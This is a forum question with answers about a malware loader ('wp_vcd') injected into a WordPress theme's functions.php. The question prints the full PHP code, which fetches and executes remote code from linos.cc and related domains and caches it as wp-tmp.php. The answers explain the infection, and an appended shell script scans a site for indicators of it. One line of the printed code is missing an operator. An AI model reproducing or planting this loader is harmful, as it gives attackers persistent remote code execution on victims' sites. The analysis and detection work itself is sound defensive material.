What does this code do? (Injected code hacked)

The code below was injected into my WordPress theme's functions.php. Can someone explain what the code does? How was that done?

$div_code_name = "wp_vcd";
$funcfile      = __FILE__;
if(!function_exists('theme_temp_setup')) {
    $path = $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'];
    if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false  stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {

        function file_get_contents_tcurl($url)
        {
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
            curl_setopt($ch, CURLOPT_HEADER, 0);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
            $data = curl_exec($ch);
            curl_close($ch);
            return $data;
        }

        function theme_temp_setup($phpCode)
        {
            $tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
            $handle   = fopen($tmpfname, "w+");
            if( fwrite($handle, "?php\n" . $phpCode))
            {
            }
            else
            {
                $tmpfname = tempnam('./', "theme_temp_setup");
                $handle   = fopen($tmpfname, "w+");
                fwrite($handle, "?php\n" . $phpCode);
            }
            fclose($handle);
            include $tmpfname;
            unlink($tmpfname);
            return get_defined_vars();
        }


        $wp_auth_key='7af507a87318d795efbdb0a3a9028aad';
        if (($tmpcontent = @file_get_contents("http://www.linos.cc/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.linos.cc/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {

            if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                        @file_put_contents('wp-tmp.php', $tmpcontent);
                    }
                }

            }
        }


    elseif ($tmpcontent = @file_get_contents("http://www.linos.me/code.php")  AND stripos($tmpcontent, $wp_auth_key) !== false ) {

        if (stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent));
            @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

            if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                    @file_put_contents('wp-tmp.php', $tmpcontent);
                }
            }

        }
    } elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
        extract(theme_temp_setup($tmpcontent));

    } elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
        extract(theme_temp_setup($tmpcontent)); 

    } elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
        extract(theme_temp_setup($tmpcontent)); 

    } elseif (($tmpcontent = @file_get_contents("http://www.linos.xyz/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.linos.xyz/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {
        extract(theme_temp_setup($tmpcontent)); 

    }





}
}



Hard to say with specifics 'how' the code got there. But I'd guess a security vulnerability in your theme, or a plugin.

In any case, it will add content to your page - spammy links, or perhaps even try to run code on the visitor's system. (As @mat mentioned in his answer.)

So, you need to get rid of it. Lots of googles on how to 'un-hack' a site. It takes some effort, but can be done, IMHO. I even wrote a process on how to do it, based on my experiences cleaning up a site: http://securitydawg.com/recovering-from-a-hacked-wordpress-site/ .


It gets code from a remote location (http://www.linos.cc/code.php) and stores it within a temporary file using sys_get_temp_dir() - http://php.net/manual/en/function.sys-get-temp-dir.php - and then creates a wp-tmp.php file with the before-mentioned code within your WordPress installation in the following locations:

/wp-includes/wp-tmp.php

and

/wp-content/themes/your-theme-name/wp-tmp.php

The code that's stored in this file (http://www.linos.cc/code.php) appears to append content to your WordPress site's pages using the the_content WordPress filter - https://codex.wordpress.org/Plugin_API/Filter_Reference/the_content.

P.S. The domain name linos.cc is registered with NameCheap - https://www.namecheap.com/ - so you could always report the domain to them as being used for abuse/malicious purposes. You can view details of the domain and get the domain registrar's abuse reporting email here: http://whois.domaintools.com/linos.cc
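
The file locations named in this answer and the identifiers in the posted sample can be checked for mechanically. The script below is an added example, not part of the original question or answers; its function names are hypothetical, and the sample tree it can build is constructed and contains only inert text.

```shell
#!/bin/sh
# Added example (not from the original post): look for traces of the injection
# quoted above. All indicator strings and file names come from that sample.

# PHP files under $1 containing identifiers or URLs from the injected block.
scan_injected_code() {
    find "$1" -type f -name '*.php' -exec grep -lE \
        -e 'theme_temp_setup|file_get_contents_tcurl|div_code_name' \
        -e 'linos\.(cc|me|xyz)/code\.php' {} + 2>/dev/null | sort
}

# Cached payload copies: the sample writes wp-tmp.php to wp-includes/,
# the theme directory, or the current working directory.
find_dropped_payload() {
    find "$1" -type f -name 'wp-tmp.php' 2>/dev/null | sort
}

# Print every finding; return 0 if anything was found, 1 if the tree is clean.
check_wordpress_tree() {
    findings=$( { scan_injected_code "$1"; find_dropped_payload "$1"; } | sort -u )
    if [ -n "$findings" ]; then
        printf '%s\n' "$findings"
        return 0
    fi
    return 1
}

# Constructed sample tree (inert text, no real payload) for trying the checks.
make_sample_tree() {
    t=$(mktemp -d)
    mkdir -p "$t/wp-includes" "$t/wp-content/themes/demo" "$t/wp-content/themes/clean"
    printf '%s\n' '<?php // constructed' 'if(!function_exists("theme_temp_setup")) {}' \
        > "$t/wp-content/themes/demo/functions.php"
    printf '%s\n' '<?php // constructed placeholder' > "$t/wp-includes/wp-tmp.php"
    printf '%s\n' '<?php // constructed clean file' 'add_action("init", "x");' \
        > "$t/wp-content/themes/clean/functions.php"
    printf '%s\n' "$t"
}

# Usage: sh scan.sh /path/to/wordpress
if [ "$#" -gt 0 ]; then
    check_wordpress_tree "$1" || echo "no indicators found under $1"
fi
```

A hit on wp-tmp.php alone means the cached copy is present; the loader in functions.php has to be removed as well, because it rewrites that file whenever it can fetch the remote code.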
